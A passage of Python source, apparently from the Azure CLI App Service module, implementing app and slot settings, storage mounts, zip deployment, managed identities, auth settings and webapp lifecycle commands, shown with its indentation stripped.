# Slot settings logic to add new settings or remove existing ones
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
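# The --settings/--slot-settings values accepted above come in two shapes: plain KEY=VALUE pairs, or
# JSON in the shape produced by the corresponding "list" command. A hypothetical invocation sketch
# (resource names and values are illustrative only):
#   az webapp config appsettings set -g MyRG -n MyApp --settings KEY1=value1 KEY2=value2
#   az webapp config appsettings set -g MyRG -n MyApp \
#       --slot-settings '[{"name": "FEATURE_FLAG", "value": "on", "slotSetting": true}]'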
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We may need to retry fetching the plan because, when the plan is created as part of the function app,
# it can take a few attempts before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a helper method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise ResourceNotFoundError("WebApp'{}', is not found on RG '{}'.".format(name, resource_group_name))
webapp.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently, switching is only allowed between Consumption and Elastic Premium plans.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports Windows-to-Windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# filter out apps with kind == null as well as function apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
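# Shape of the returned tuple, illustrated (MSI_LOCAL_ID marks the system-assigned identity; the
# resource id below is hypothetical):
#   _build_identities_info(None)
#     -> ({'type': 'SystemAssigned'}, 'SystemAssigned', [], True)
#   uai = '/subscriptions/.../userAssignedIdentities/myid'
#   _build_identities_info([uai])
#     -> ({'type': 'UserAssigned', 'userAssignedIdentities': {uai: {}}}, 'UserAssigned', [uai], False)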
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
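# Accepted --runtime-version formats, illustrated:
#   is_auth_runtime_version_valid(None)      -> True   (nothing to validate)
#   is_auth_runtime_version_valid('~2')      -> True   ('~' followed by an integer)
#   is_auth_runtime_version_valid('1.4.0')   -> True   (exactly three numeric parts)
#   is_auth_runtime_version_valid('1.4')     -> False
#   is_auth_runtime_version_valid('~latest') -> False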
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to an invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# the stacks API is updated with Antares deployments,
# which are infrequent and don't line up with the stacks' EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
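# Semantics of the three filters, illustrated against hypothetical Kudu settings {'A': '1', 'B': '2'}:
#   should_have=['A']             -> True   (key must exist; value is not checked)
#   should_not_have=['C']         -> True   (key must be absent)
#   should_contain={'A': '1'}     -> True   (key must exist with exactly this value)
#   should_contain={'A': 'other'} -> False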
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
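# Resulting fx_version strings, illustrated (image names are hypothetical):
#   _format_fx_version('nginx')                      -> 'DOCKER|nginx'
#   _format_fx_version('DOCKER|nginx')               -> 'DOCKER|nginx'   (already prefixed)
#   _format_fx_version('<base64 config>', 'COMPOSE') -> 'COMPOSE|<base64 config>'
# 'https://' and 'http://' prefixes on the image name are stripped before the prefix is applied.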
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
